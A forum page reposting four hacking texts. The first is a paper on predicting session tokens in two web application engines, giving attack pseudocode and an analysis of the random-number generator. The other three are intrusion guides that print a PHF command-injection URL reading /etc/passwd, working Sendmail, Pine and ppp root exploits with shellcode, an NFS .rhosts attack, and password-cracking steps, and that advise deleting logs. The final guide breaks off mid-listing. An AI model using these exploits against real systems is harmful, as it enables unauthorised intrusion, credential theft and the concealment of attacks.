www.crack$hack.ws - Recently Updated Pages

Hacking Web Applications Using Cookie Poisoning

punkey8oy — Fri, 25 Jul 2008 03:32:15 CDT

Summary Cookie poisoning is a known technique mainly for achieving impersonation and breach of privacy through manipulation of session cookies, which maintain the identity of the client. By forging these cookies, an attacker can impersonate a valid client, and thus gain information and perform actions on behalf of the victim. The ability to forge such session cookies (or more generally, session tokens) stems from the fact that the tokens are not generated in a secure way. In this paper, we explain why session management (and session management security) is a complex task (which is why it is usually left for commercial products). We describe how the tokens are generated for two commercial application engines. We then analyze the strength of each mechanism, explain its weakness, and demonstrate how such weakness can be exploited to execute an impersonation/privacy breach attack. We discuss the feasibility of the attack. Finally, we recommend an approach to session management which separates the security from the functionality – the latter is carried out by application engines, while the former should be provided by a dedicated application security product. The Sysiphian in-house session maintenance In web application programming, Session Management is complex and awkward. The programmer needs to worry about many aspects of session management which can defocus him/her from the main goal – implementing the business logic that makes the site unique and profitable. Specific issues are: • Session creation and identification – how to ensure that when a new session is needed, it is indeed created? The programmer must identify that a client has a need for a session, create the session and assign the client a session. • Concurrency issues – when two clients access the site simultaneously, each requiring a new session, it is necessary to make sure that the session creation process will still function correctly. • Session termination and timeout – what triggers a session termination? How are the resources of the terminated session recycled? What happens if the client tries to access the site when the termination process is taking place? What happens when a client tries to access a site with a stale session? ¤2002 Sanctum, Inc. 1 www.SanctumInc.com • Session data storage, multiple servers, fail-over – where is the session data stored (on disk? in RAM?)? What is the performance penalty? What happens in a multi-server site if a client accesses a first server (and establishes a session with it) and then is directed (by a load balancer) to a second server? What happens to the client session data in case the original server crashes? Security-wise, the following considerations must be made: • • • It should never be possible for one client to be able to predict the token another client received, or is in the process of receiving, or will receive. This is obviously a ‘must have’ in order to prevent impersonation attacks and consequently breach of privacy. Furthermore, it is desirable that a client will not be able to predict the next token he/she will get when accessing the site. This is useful in minimizing the damage of stealing the token while it travels (in the clear) to and fro, and while it is stored on disk at the client. Any token should have a reasonable expiration period – again, to minimize the damage of it being stolen. As can be seen, it is not very easy to fulfill all these requirements, especially if the session mechanism is developed ad-hoc. The more intricate security requirements are definitely something developers, especially ones not versed in security, may easily miss. One recent example is the cookie mechanism that was employed by Verizon Wireless (www.verizonwireless.com and www.app.airtouch.com). The security problem is mentioned in the press (http://www.newsbytes.com/news/01/169781.html), and in technical resources (http://online.securityfocus.com/archive/1/211520 - a report by Marc Slemko, dated September 1st, 2001). To quote from the latter: Cell phone bills are often very interesting things, since they contain names, addresses, and a complete record of calls placed and received, along with the approximate location the user was when the call was made. I'm sure I'm not alone in expecting my provider to provide a reasonable level of privacy for this data. A typical URL used by this "my account" service is: https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_se ssion_id=3346178&p_host=ACTION Note the p_session_id parameter. This is the only session identifier used. They are assigned sequentially to each user as they login, and are valid until the user logs out or the session times out. Obviously, this makes it trivial to access the sessions of other users by guessing the session ID. Automated tools to grab this information in bulk as users login over time are also trivial. As we see here, the problem is simple: the Verizon Wireless site assigns a token (in this case, it appears as a parameter named p_session_id) to each logged-in visitor in the site. This token is used to identify the visitor. The token value is sequentially incremented per each new visitor, hence if you’re a visitor and your p_session_id is N, the next visitor will be assigned N+1. This is an extremely predictable mechanism, and it completely violates all security requirements (although it probably fulfills all the functional requirements). ¤2002 Sanctum, Inc. 2 www.SanctumInc.com Many other examples of insufficient security in tokens are demonstrated in the work of MIT Laboratory for Computer Science (“Dos and Don’ts of Client Authentication on the Web” by Kevin Fu, Emil Sit, Kendra Smith and Nick Feamster) http://cookies.lcs.mit.edu/pubs/webauth:tr.pdf So we see that it is difficult to come out with a good session management solution, let alone a secure session management solution. This is one of the reasons why application servers are so popular. Application Servers/Engines – a solution and a problem An Application Server (or Application Engine) is a software program designed to make the life of the application developer easy. It usually offers the programmer the ease of writing HTML pages with directives for the server embedded in them, instructing the server to perform various tasks. Most application servers provide the programmer an environment that takes care of the session automatically, relieving the programmer from all the worries mentioned in the above section. Examples of application servers: Microsoft ASP (Active Server Pages) – runs on top of IIS. Macromedia (formerly Allaire) ColdFusion Apache Tomcat Apache JServ PHP BEA WebLogic IBM WebSphere BroadVision Some frequency analysis can be found here (https://secure1.securityspace.com/s_survey/data/man.200203/cookieReport.html), through associating the cookie names with the server that issues them. This is of course biased, since some servers and sites use tokens in form parameters rather than in cookies. The upside of application engines is the fact that they completely relieve the programmer from worrying about session management. All functionality aspects of session management are taken care of, usually much better than an in house programmer could have achieved. The downside of application engines is the fact that they seem to relieve the programmer from worrying about the security of the token, yet we can show that the harsh reality is far from that. In fact, some very popular application engines do not provide secure tokens. As a result, the programmer obtains a false sense of security. We examined the tokens generated by two popular application servers. In both cases, we were able to demonstrate that the token is not as random as it seems, and that it is possible (in one case, with ease), to predict the values of the token for the next sessions (of a different client). ¤2002 Sanctum, Inc. 3 www.SanctumInc.com Example 1 – beating a time based token The target of this attack is a very popular commercial application engine. The product uses two cookies to identify a session. The pair formed by the two cookies identifies the session. The first cookie is merely a counter, incremented once per new session. It probably ensures that no two pairs are ever identical. The second cookie is the token cookie, apparently intended to secure the pair by being “unpredictable”. Since it is very easy to predict the first cookie, we focus on the second cookie, which we’ll denote as “TOKEN”. At first glance, TOKEN seems to be a sequence of random 8 decimal digits. The entropy (amount of randomness) here is 108 = 226.57 which may be considered sufficient, considering that it’s quite unfeasible to try such amounts of requests (100 million) against a site without triggering some kind of alarm and human attention. But, a closer look reveals that in fact, TOKEN obeys the following equation: Let us denote by t the GMT time, in seconds, since 01/01/1970 00:00, as set on the application server. Let us denote by m the milliseconds portion of the tick counter on the application server. Then: TOKEN= ( 31415821 * (t + m) + 1 ) mod 100000000 It is interesting to note that t can be extracted from the HTTP Date header the server sends back to the client together with the first time the cookies are set. This means that the TOKEN cookie is quite predictable. In fact, if one knows a range of time T ≤ t < T+∆T (in seconds) in which a cookie was generated, one can infer that TOKEN has one of ∆T+1000 values, which is a rather short list of values. Testing a bit more than a thousand values against the server may take few minutes, in which the victim session is likely to remain active. The outline of an attack algorithm is as following: Obtain a first pair (id1, TOKEN1). Record t1 – the server time (from the Date HTTP header) Wait ∆T seconds. Obtain a second pair (id2, TOKEN2). Record t2 – the server time (from the Date HTTP header) if (id2 > id1 +1) begin // we have a victim session interjected here. for (x= t1 ; x < t2 +1000 ; x++) // which is ∆T+1000 iterations begin Try the pair (id1 +1, ( 31415821 * x + 1 ) mod 100000000) end end ¤2002 Sanctum, Inc. 4 www.SanctumInc.com In fact, it is possible to improve this algorithm in some cases by using the fact that on some operating systems, the tick counter does not have millisecond granularity, but rather a coarser granularity of around 10msec. This can be used to reduce the search space even further. The attack described above enables the attacker to impersonate a victim, provided that such victim was assigned a cookie between the two samples the attacker made of the site cookies. Since the attacker can repeat the algorithm as many times as he/she would like, it is possible for him/her to obtain these cookies for all clients, at a price of sampling the site (say, one request every minute), and additionally some 1060 requests per any new client discovered. Again, as hinted above, it is possible to sample at closer intervals (once a second) and exploit the granularity problem of the clock ticks, in which case it is probably possible to arrive at 100 requests per new client. It is likely that if an attempt to impersonate a client is performed while the site is loaded with traffic, then the additional hundreds/thousands of request would go unnoticed, at least momentarily. Example 2 – When Random() isn’t random In this example, we deal with a still popular (yet a bit outdated) application engine. This engine generates a single cookie for each new session. This cookie (which we shall name ID) comprises of 3 mandatory fields (F1, F2 and F3), and one optional (server configuration dependent) field (F4, preceded by a dot), concatenated. The fields are as following: F1 = 6 characters (A-Z0-9) – PRNG (Pseudo Random Number Generator) data, represented in base 36 with leading zeroes. F2 = 3 characters (A-Z0-9) – server time (milliseconds), divided by 2000, mod 363 (= 46656), represented in base 36 with leading zeroes. F3 = 3 characters (A-Z0-9) – session count in this 2 second time slice, represented in base 36. F4 = constant string (per server). As can be seen, F4 (if it exists) is constant, and hence trivially predictable. F2 is simply the server time (in seconds) divided by 2, modulo 46656, which is quite predictable, and F3 is not too obscure as well – as it is sequentially incremented in the 2 seconds time slice (always begins at one). The only interesting field is therefore F1. Apparently, it holds enough entropy to secure the system, since it can assume 366 values (=231.0). Yet again, what seems secure at first sight appears not so secure when performing a full analysis. Explanation on how and why F1 can be predicted is provided in Appendix A, since it is too long for inclusion here. The problem we exploited with F1 is the fact that it uses a PRNG (Pseudo Random Number Generator), which in itself is predictable. So knowing several values of F1 suffices to fully predict the PRNG, and hence future (and past) values of F1. ¤2002 Sanctum, Inc. 5 www.SanctumInc.com The outline of an attack is as following: Preparation: Obtain three IDs, in the shortest time intervals possible. Extract the PRNG internal state (as explained in Appendix A). Interception Cycle Obtain an ID, and record the server time, t. For simplicity, assume t is even. Find the PRNG internal state that was used to generate this ID (as explained in Appendix A) Wait ∆T seconds (where ∆T is even) Obtain a new ID. Advance the PRNG, and record all internal states between the PRNG state of the old ID and the PRNG state that generated this ID (As explained in Appendix A). Let the list of internal values be L // ∆T/2 iterations: for (T=t; T<t+∆T; T+=2) begin for each internal PRNG state L, i. begin Try an ID cookie consisting of: F1=generate from sample of PRNG at state i and i+1; F2=T; F3=1; // first session in this 2-second time period F4=F4 of any ID above; //constant per server end end As can be seen, it is feasible, although not trivial, to predict some ID cookies. For feasibility, it is required that the time interval (∆T) be short (with respect to the expected usage of the server), in order to minimize the length of L (the list of possible internal PRNG states). If these intervals are indeed very short (less than two seconds), it may be possible, with correct timing, to tell whether a new session was interjected at the current 2 second time slice, which makes the attack more effective (since it requires launching the additional requests only when it is known that a new victim session was indeed created). It should also be mentioned that in order not to lose synchronization (of the PRNG internal state) with the site, it is necessary to keep requesting a new ID from time to time, in order to advance the attacker’s PRNG internal state to the new value. It should be remembered that the PRNG is likely to be used for many purposes, not just the creation of sessions. This means that the site may use the PRNG intensively, thus causing a quick de-synchronization (to counter which it is necessary to re-sync at close time intervals, e.g. every few minutes). On the other hand, it may be possible to get a clearer glimpse of the internal PRNG state by inspecting other random values that may be used in the site. This may offer a shortcut saving a lot of computation power. ¤2002 Sanctum, Inc. 6 www.SanctumInc.com It should be noted, that once the attacker is in synch with the site, and if ID’s are extracted frequently enough, it is possible to impersonate any client at the expanse of sending few (depends on the usage of the PRNG) requests. What the involved vendors say Vendor 1 acknowledged the weakness, and informed us that its customers should use SSL certificates for session management. While this is perhaps a good idea for some customers (but definitely not for all customers – moving to SSL and SSL certificates is definitely not trivial, and sometimes not possible), the documentation for its product leads the reader to believe that the built-in session management is secure (they name it “the client security token” in their documentation for developers). Also, the vendor does not make this suggestion public. Vendor 2 acknowledged the weakness yet wrote us “session cookies are -NOT- a replacement for authentication tokens. A session cookie in conjunction with a random auth token or auth login validation is both reasonable mechanisms. This should be true in designing session based scripts - even where the session tokens are 'trusted' today.” – thus laying the responsibility in the hands of the developers. The two vendors, while technically acknowledging the problem, dismissed it as a non-security issue. That is, both vendors assume their customers implement their own session security tokens, not relying on the vendor tokens. The vendors, therefore, claim that their tokens are used (or should be used) solely to better differentiate between different users, and not as a security measure. In the documentation, we did not find any warning against using the token as a secure session identifier. Furthermore, Vendor 1’s documentation uses phrases that lead one to believe that this token is secure. And in reality, of course, most sites use the tokens issued by vendors as a secure session identifier, oblivious to the fact that it is weak. In a sense, the application developer is back to square one: he/she cannot trust the built-in session identification mechanism, and thus is forced to write his/her own such mechanism, with best effort to fulfill all the requirements mentioned above and to avoid the delicate pitfalls of cryptography. Conclusion We see session security falls between the cracks –vendors don’t do it right, don’t care for it, or delegate the responsibility for it to the developers, while in-house development is error-prone, and requires a deep understanding of security. In this paper, we provided real life examples for both insecure tokens in commercial application engines, as well as in home grown applications. Our solution is simple – the world of web applications should consist of three components: • The application (which is developed in house, and expresses the business logic, as well as the novelty and specialty of the company/site). ¤2002 Sanctum, Inc. 7 www.SanctumInc.com • • The application environment (the application engine and web server, which enable easy application development and focus on the application rather than on infrastructure). Web application security component, which takes care of the application security, again relieving the developers (and to some extent, the application engine developers too!) from having to worry about secure implementation of their application. In all the above cases, a web application firewall would have fortify the tokens generated by the application engines (or by the in house developed application) transparently (the developer needn’t even be aware of this), and ensure, through using strong cryptography and security tested mechanisms, that the tokens sent to the application are indeed genuine, and not forged. ¤2002 Sanctum, Inc. 8 www.SanctumInc.com Appendix A – Analysis of the PRNG Used in Example 2 The PRNG in example 2 is a linear congruence type PRNG. Its internal state consists of 48 bits (the variable “state”). The PRNG is seeded once (that is, an initial value for “state” is provided), and then advances in the following manner: state = (state * 25214903917 + 11) mod 248 sample = state / 216 As can be seen, sample is a 32 bit number. The ID generation mechanism concatenates two consecutive samples to form a 64 bit integer, which may be negative (if the most significant bit is 1). Then, absolute value of this number is taken, and mod 366 is applied to yield F1. And now to some mathematics: we want to be able to predict the values sampled from this PRNG. We do get a direct glimpse at the state bits. To understand why, let us consider the mathematical representation of F1. Let the two samples needed for F1’s generation be denoted S1 and S2. Then: S1= [don’t care] S2 = state / 216 N= S1 * 232 + S2 if (N ≥ 263) N=264-N //make sure N is “positive” – i.e. most significant bit is 0. F1=N mod 366 Since 366 = 212 * 312, it follows that F1 mod 212 = N mod 212 or F1 mod 212 = (-N) mod 212 And since N = S1 * 232 + S2, it follows that F1 mod 212 = S2 mod 212 or F1 mod 212 = (-S1) mod 212 We see, therefore, that F1 mod 212 provides us with two options for the 12 least significant bits of S2, which, in turn are the bits 16-27 of state (denoting the least significant bit as 0 and the most significant bit as 47). Now, we can guess the 16 least significant bits of state, and together we’ll have the 28 least significant bits of state. We have 217 guesses (216 for the 16 least significant bits of state, and 2 for the original sign of N). The number of guesses can be easily reduced by taking another sample, as close as possible (i.e. with as few samples of PRNG in between), and verifying against the 11 bits of information (12 bits minus the sign bit). If it is possible to achieve two IDs with less than (say) 16 advances of the PRNG in between, then with a calculation of 217*16 we can reduce the number of guesses we ¤2002 Sanctum, Inc. 9 www.SanctumInc.com have to 2^10. Applying this argument twice more will show that with 4 ID’s generated close enough, it is possible to come out with a single verified value for the 28 least significant bits of state (for all IDs), with no more than few million calculations. Finally, we can also guess the 20 most significant bits, and we can easily verify them using the ID’s we have, because once all the bits of state are known, it is possible to calculate F1 accurately. In order to check all guesses at this phase, we need to perform few million calculations. The above can be easily performed using a standard PC (Pentium-III or Pentium-4) in few minutes or less. After this, the full state of the PRNG becomes known. This enables to accurately follow the PRNG to the future and to the past. For example, if one has the current value of the PRNG, and an ID that was produced from the PRNG after some advances have taken place, it is possible to find the PRNG state associated with the ID, as well as all PRNG states in between (and the ID that may have been produced for them) via simply advancing the PRNG and generating the ID, until the ID generated matches the one obtained from the server. This provides both a list of possible IDs between the time the PRNG was at the known state and the time the ID was obtained, as well as the current state of the PRNG (the one matching the obtained ID). It should be noted that an ID is obtained from sampling two consecutive states of the PRNG. But since it is impossible to know how the PRNG is used, we must check every possibility for having two consecutive pairs. So if the PRNG states are A, B, C and D we must list the IDs formed from (A,B), (B,C) and (C,D).

Hacking Webpages - The Ultimate guide

punkey8oy — Fri, 25 Jul 2008 03:26:43 CDT

Hacking Webpage - The Ultimate guide Author : Virtual Circuit and Psychotic Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that we recieved after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects. Getting the Password File Through FTP Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file... root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file. root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file: root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well. Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it. Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you. The PHF Technique Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it. The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link: http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type: http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd and that's it! You just sit back and copy the file(if it works). Telnet and Exploits Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need. It�s best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I�m going to list a few below but the list of exploits is endless. This exploit is known as Sendmail v.8.8.4 It creates a suid program /tmp/x that calls shell as root. This is how you set it up: cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi and now on to another exploit. I�m going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile. Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile. This was writen by Sean B. Hamor�For this example, hamors is the victim while catluvr is the attacker: hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 ++ catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors now on to another one, this will be the last one that I�m going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up: v #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } Now that you�ve gotten root "what�s next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your worstJ Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learing ethnical hacking that you download our Unix Bible.

Hacking Servers A Beginner's Guide

punkey8oy — Fri, 25 Jul 2008 03:25:32 CDT

Hacking Servers A Beginner's Guide Hacking Servers: A Beginner's Guide By: Lord Dredd I am asked at least 5 or more times a day by young, beginning "hackers", "How can I hack?" or "Is there a way to hack a web site?" Well there is. There are, in fact, literally hundreds of ways to do this. I will discuss a few in this text to get you started. Every hacker has to start somehow and hacking web servers and ftp servers is one of the easiest ways. If you are reading this I am assuming that you already have a basic knowledge of how web servers work and how to use some form of UNIX. But I am going to explain that stuff anyway for those of you who don't know. Part 1: Simple UNIX Commands Most DOS commands have UNIX and Linux equivalents. Listed below are some of the main commands you will need to know to use a shell account. HELP = HELP COPY = CP MOVE = MV DIR = LS DEL = RM CD = CD To see who else is on the system you can type WHO. To get information about a specific user on the system type FINGER <username>. Using those basic UNIX commands you can learn all you need to know about the system you are using. Part 2: Cracking Passwords On UNIX systems the file that contains the passwords for all the users on the system is located in the /etc directory. The filename is passwd. I bet your thinking...."Great. All I have to do is get the file called /etc/passwd and I'll be a hacker." If that is what you are thinking then you are dead wrong. All the accounts in the passwd file have encrypted passwords. These passwords are one-way encrypted which means that there is no way to decrypt them. However, there are programs that can be used to obtain passwords from the file. The name of the program that I have found to be the best password cracker is called "Cracker Jack." This program uses a dictionary file composed of thousands of words. It compares the encrypted forms of the words in the list to the encrypted passwords in the passwd file and it notifies you when it finds a match. Cracker Jack can be found at my web site which is at http://www.geocities.com/SiliconValley/9185 Some wordlists can be found at the following ftp site: sable.ox.ac.uk/ pub/wordlists. To get to the wordlist that I usually use goto that ftp site then goto the American directory. Once you are there download the file called dic-0294.tar.Z which is about 4 MB. To use that file it must be uncompressed using a program like Gzip for DOS or Winzip for Windows. After uncompressing the file it should be a text file around 8 MB and it is best to put it in the same directory as your cracking program. To find out how to use Cracker Jack just read the documentation that is included with it. Part 3: The Hard Part (Finding Password Files) Up till now I have been telling you the easy parts of hacking a server. Now we get to the more difficult part. It's common sense. If the system administrator has a file that has passwords for everyone on his or her system they are not going to just give it to you. You have to have a way to retrieve the /etc/passwd file without logging into the system. There are 2 simple ways that this can sometimes be accomplished. Often the /etc directory is not blocked from FTP. To get the passwd file this way try using an FTP client to access the site anonymously then check the /etc directory to see if access to the passwd file is restricted. If it is not restricted then download the file and run Cracker Jack on it. If it is restricted then try plan B. On some systems there is a file called PHF in the /cgi-bin directory. If there is then you are in luck. PHF allows users to gain remote access to files (including the /etc/passwd file) over the world wide web. To try this method goto your web browser and type in this URL: http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Then substitute the site you are trying to hack for the xxx.xxx.xxx. For example, if I wanted to hack St. Louis University (and I have already) I would type in http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Don't bother trying www.slu.edu because I have already done it and told them about their security flaw. Here's a hint: try www.spawn.com and www.garply.com If the preceding to methods fail then try any way you can think of to get that file. If you do get the file and all the items in the second field are X or ! or * then the password file is shadowed. Shadowing is just a method of adding extra security to prevent hackers and other unwanted people from using the password file. Unfortunately there is no way to "unshadow" a password file but sometimes there are backup password files that aren't shadowed. Try looking for files such as /etc/shadow and other stuff like that. Part 4: Logging In To "Your" New Shell OK....This is where you use what you found using Cracker Jack. Usernames and passwords. Run your telnet client and telent to the server that you cracked the passwords for, such as www.slu.edu. When you are connected it will give a login screen that asks for a login names and password and usually information on the operating system that the server is using (usually UNIX, linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms). Just type in the information you got after cracking the passwd file and whatever you know about UNIX to do whatever you feel like doing. But remember that hacking isn't spreading viruses or causing damage to other computer systems. It is using your knowledge to increase your knowledge. Part 5: Newbie Info If you feel that you have what it takes to be a serious hacker then you must first know a clear definition of hacking and how to be an ethical hacker. Become familiar with unix environments and if you are only just starting to learn to hack, visit a local library and find some books on various operating systems on the internet and how they work. Or you could go to a book store and buy a couple internet security books. They often explain how hackers penetrate systems and that is something a beginner could use as an advantage.

Hacking step by step User's guide

punkey8oy — Fri, 25 Jul 2008 03:23:33 CDT

Hacking step by step User's guide __________________________ Well, howdi folks... I guess you are all wondering who's this guy (me) that's trying to show you a bit of everything... ? Well, I ain't telling you anything of that... Copyright, and other stuff like this (below). Copyright and stuff... ______________________ If you feel offended by this subject (hacking) or you think that you could do better, don't read the below information... This file is for educational purposes ONLY...;) I ain't responsible for any damages you made after reading this...(I'm very serious...) So this can be copied, but not modified (send me the changes, and if they are good, I'll include them ). Don't read it, 'cuz it might be illegal. I warned you... If you would like to continue, press <PgDown>. Intro: Hacking step by step. _________________________________________________________________________________ Well, this ain't exactely for begginers, but it'll have to do. What all hackers has to know is that there are 4 steps in hacking... Step Step Step Step 1: 2: 3: 4: Getting access to site. Hacking r00t. Covering your traces. Keeping that account. Ok. In the next pages we'll see exactely what I ment. Step 1: Getting access. _______ Well folks, there are several methods to get access to a site. I'll try to explain the most used ones. The first thing I do is see if the system has an export list: mysite:~>/usr/sbin/showmount -e victim.site.com RPC: Program not registered. If it gives a message like this one, then it's time to search another way in. What I was trying to do was to exploit an old security problem by most SUN OS's that could allow an remote attacker to add a .rhosts to a users home directory... (That was possible if the site had mounted their home directory. Let's see what happens... mysite:~>/usr/sbin/showmount -e victim1.site.com /usr victim2.site.com /home (everyone) /cdrom (everyone) mysite:~>mkdir /tmp/mount mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/ mysite:~>ls -sal /tmp/mount total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------1 root root 242 Mar 9 1997 sudoers 1 drwx-----3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/ Well, we wanna hack into rapper's home. mysite:~>id uid=0 euid=0 mysite:~>whoami root mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history forget it on the remote server... mysite:~>su - rapper Welcome to rapper's user. mysite:~>ls -lsa /tmp/mount/ total 9 1 drwxrwxr-x 8 root 1 drwxr-xr-x 19 root 1 drwxr-xr-x 3 at1 1 